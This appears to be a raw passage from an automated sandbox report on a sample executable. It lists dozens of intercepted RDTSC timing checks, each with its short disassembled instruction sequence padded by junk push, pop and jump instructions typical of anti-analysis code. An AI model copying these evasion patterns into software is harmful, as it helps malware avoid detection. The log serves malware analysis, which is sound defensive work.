                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7F76 second address: 5B7FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007FC218F099BCh 0x0000000d jg 00007FC218F099B6h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FC218F099BAh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FC218F099B8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7FA4 second address: 5B7FCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2192E8594h 0x00000008 jmp 00007FC2192E858Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jg 00007FC2192E8586h 0x0000001e popad 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7FCC second address: 5B7FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A2687 second address: 5A268D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A268D second address: 5A26A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC218F099BAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A26A4 second address: 5A26D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnc 00007FC2192E8586h 0x0000000f jmp 00007FC2192E858Ah 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC2192E8598h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A26D8 second address: 5A26DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7D8B second address: 5D7D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7EF0 second address: 5D7F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC218F099B6h 0x0000000a jl 00007FC218F099B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7F05 second address: 5D7F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7F09 second address: 5D7F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7F0F second address: 5D7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC2192E858Ah 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnc 00007FC2192E858Ch 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7F2E second address: 5D7F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D7F34 second address: 5D7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC2192E8586h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D81BB second address: 5D81C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D85DD second address: 5D85E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8768 second address: 5D876E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D876E second address: 5D8772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D890C second address: 5D8912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8A5E second address: 5D8A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8A69 second address: 5D8A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC218F099D0h 0x0000000f jns 00007FC218F099BEh 0x00000015 jnl 00007FC218F099B6h 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007FC218F099BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8CF7 second address: 5D8D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC2192E8586h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8D12 second address: 5D8D51 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC218F099B6h 0x00000008 ja 00007FC218F099B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007FC218F099B6h 0x00000017 jmp 00007FC218F099C4h 0x0000001c jmp 00007FC218F099C2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D8D51 second address: 5D8D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5CE04E second address: 5CE05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC218F099BAh 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A5E4D second address: 5A5E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A5E53 second address: 5A5E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A5E57 second address: 5A5E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9742 second address: 5D9748 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D1C second address: 5D9D30 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC2192E858Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D30 second address: 5D9D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D37 second address: 5D9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D3F second address: 5D9D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D4A second address: 5D9D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5D9D4F second address: 5D9D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A783F second address: 5A787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jo 00007FC2192E8586h 0x0000000c jmp 00007FC2192E858Dh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC2192E8597h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d jo 00007FC2192E8588h 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DD752 second address: 5DD76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099C6h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DD76C second address: 5DD788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ah 0x00000007 jne 00007FC2192E8588h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DD788 second address: 5DD798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC218F099BAh 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A9303 second address: 5A9307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A9307 second address: 5A9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A9314 second address: 5A9331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8598h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A9331 second address: 5A9339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A9339 second address: 5A9354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jc 00007FC2192E8596h 0x0000000f jmp 00007FC2192E858Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DF52F second address: 5DF535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DF535 second address: 5DF539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5DF539 second address: 5DF53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E0554 second address: 5E055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E06B9 second address: 5E06BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E6433 second address: 5E6438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AAD7D second address: 5AAD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FC218F099B6h 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5868 second address: 5E58A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8593h 0x00000009 jmp 00007FC2192E8592h 0x0000000e popad 0x0000000f jmp 00007FC2192E858Dh 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E58A5 second address: 5E58A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5BC6 second address: 5E5BD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2192E858Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5BD6 second address: 5E5BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5BDA second address: 5E5BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5BDE second address: 5E5BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5D4B second address: 5E5D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E5FFF second address: 5E6009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC218F099B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E6009 second address: 5E600D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E614B second address: 5E6150 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E9E3A second address: 5E9E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E9E55 second address: 5E9E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5E9F6D second address: 5E9F7C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EA09E second address: 5EA0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EA530 second address: 5EA534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EA62F second address: 5EA633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EA633 second address: 5EA63D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2192E858Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EABCD second address: 5EABD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EABD1 second address: 5EAC11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2192E8593h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e mov esi, dword ptr [ebp+13632EF9h] 0x00000014 nop 0x00000015 push eax 0x00000016 jp 00007FC2192E8590h 0x0000001c jmp 00007FC2192E858Ah 0x00000021 pop eax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jc 00007FC2192E858Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EAC11 second address: 5EAC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EAF53 second address: 5EAF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EAF58 second address: 5EAF82 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC218F099B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC218F099C7h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EB0B4 second address: 5EB0BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC2192E8586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EC825 second address: 5EC829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EC829 second address: 5EC82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AFE5C second address: 5AFE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AFE63 second address: 5AFE77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2192E858Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AFE77 second address: 5AFE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EE7B3 second address: 5EE7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EF11B second address: 5EF11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EF11F second address: 5EF12C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EF12C second address: 5EF13A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC218F099B6h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F126D second address: 5F12EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FC2192E8588h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 adc esi, 19F91DACh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FC2192E8588h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+13632F7Dh] 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FC2192E8588h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov dword ptr [ebp+13632353h], ecx 0x0000006a mov esi, 616EA334h 0x0000006f push eax 0x00000070 push ecx 0x00000071 push edi 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5EFA0E second address: 5EFA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F1B02 second address: 5F1B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F1B06 second address: 5F1B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC218F099B6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F3286 second address: 5F32A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC2192E8586h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F1B10 second address: 5F1B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F32A7 second address: 5F32AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F32AB second address: 5F32B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5F564F second address: 5F5653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
